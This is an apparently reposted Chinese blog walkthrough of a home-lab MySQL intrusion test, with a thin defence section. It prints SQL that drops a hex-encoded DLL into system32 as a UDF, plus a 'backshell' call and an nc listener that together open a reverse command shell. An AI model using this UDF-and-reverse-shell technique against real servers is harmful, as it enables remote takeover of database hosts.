MySql的入侵测试以及防范「建议收藏」

MySql的入侵测试以及防范

大家好,又见面了,我是全栈君。


在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。

总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。

正题之一

物理机:Win7

虚拟机:XP

给予mysql远程权限:

1 grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码';
2 
3 flush privileges;

 

给物理机远程权限:

MySql的入侵测试以及防范「建议收藏」

物理机成功连接上:

MySql的入侵测试以及防范「建议收藏」

执行侵入测试前(有图有真相):

MySql的入侵测试以及防范「建议收藏」

执行侵入测试后(有图有真相):

MySql的入侵测试以及防范「建议收藏」

重启前(有图有真相):

MySql的入侵测试以及防范「建议收藏」

重启后(有图有真相):

MySql的入侵测试以及防范「建议收藏」

正题之二:

远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件:

MySql的入侵测试以及防范「建议收藏」

Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号

虚拟机上:执行映射:select backshell(“物理机IP”,端口号);

这便执行了3306端口反弹CMD

(没图了。。。用到了一个nc软件执行的映射)

 

yyd.txt大概内容:

复制代码
et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';
复制代码

 

 

正题之三:

防范

MySql的入侵测试以及防范「建议收藏」

 

感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了。。。。好丢脸,只好把Win7上的MySql服务拿出来了。

觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多。

 




本文转自我爱物联网博客园博客,原文链接:http://www.cnblogs.com/yydcdut/p/3464215.html,如需转载请自行联系原作者

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/108126.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • 为什么没有小米7?[通俗易懂]

    为什么没有小米7?[通俗易懂]很多人会说小米手机没有小米7的原因,是因为7这个数字不是特别的好听。所以小米在进行第7代命名的时候将其进行了删除,所以你会发现没有小米7。但,在我看来,这种事实上并非是因为名字的问题,可能确实是因为其所代表的不是那么的舒适,不过在我看来还有一个非常重要的原因,可能就是因为小米8它刚好是小米8周年,也就是说小米7的推出实际上被改成小米8,就是印证了小米8周年的这个概念。刚好能够符合小米对于8周年的一个重视,而且这对于以后小米的10周年,小米10的出现,以及小米以后的20周年等等有更好的进行命.

  • AVAudioPlayer播放在线音频文件「建议收藏」

    AVAudioPlayer播放在线音频文件「建议收藏」AVAudioPlayer播放在线音频文件一:原里:AVAudioPlayer是不支持播放在线音频的,但是AVAudioPlayer有一个initWithData的方法;我们可以把在线音频转换为NSdata;然后播放二:如代码:NSData*soundData=[sharedAppSettingsControllergetSoundUrl:defau…

  • jvm之指令重排_java指令重排

    jvm之指令重排_java指令重排引言:在Java中看似顺序的代码在JVM中,可能会出现编译器或者CPU对这些操作指令进行了重新排序;在特定情况下,指令重排将会给我们的程序带来不确定的结果…..1. 什么是指令重排?     在计算机执行指令的顺序在经过程序编译器编译之后形成的指令序列,一般而言,这个指…

  • offset size_c语言sizeof求结构体长度

    offset size_c语言sizeof求结构体长度sizeof与offsetof在程序中经常遇到,但在面试中其应用使得许多小伙伴吃闭门羹,被面试官问得哑口无言。接下来对两者的应用做详细介绍。关于sizeof定义:sizeof乃C/C++中的一个操作符(operator),简单的说其作用就是返回一个对象或者类型所占的内存字节数。(MSDN上的解释为:Thesizeofkeywordgivestheamountofstorage,in

  • jQuery+PHP+Mysql在线拍照和在线浏览照片

    jQuery+PHP+Mysql在线拍照和在线浏览照片

  • PIC 指令周期_三菱plc分钟计时指令

    PIC 指令周期_三菱plc分钟计时指令一、PIC指令周期计算:设工作频率为:F(MHz);1个指令周期为1/(F/4)秒。二、PIC的指令 即汇编指令,不同系列指令数不一样。  8位单片机共有三个级别,有相对应的指令集。基本级PIC系列芯片共有指令33条,每条指令是12位字长;中级PIC系列芯片共有指令35条,每条指令是14位字长;高级PIC系列芯片共有指令58条,每条指令是16位字长。其指令向下兼容

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号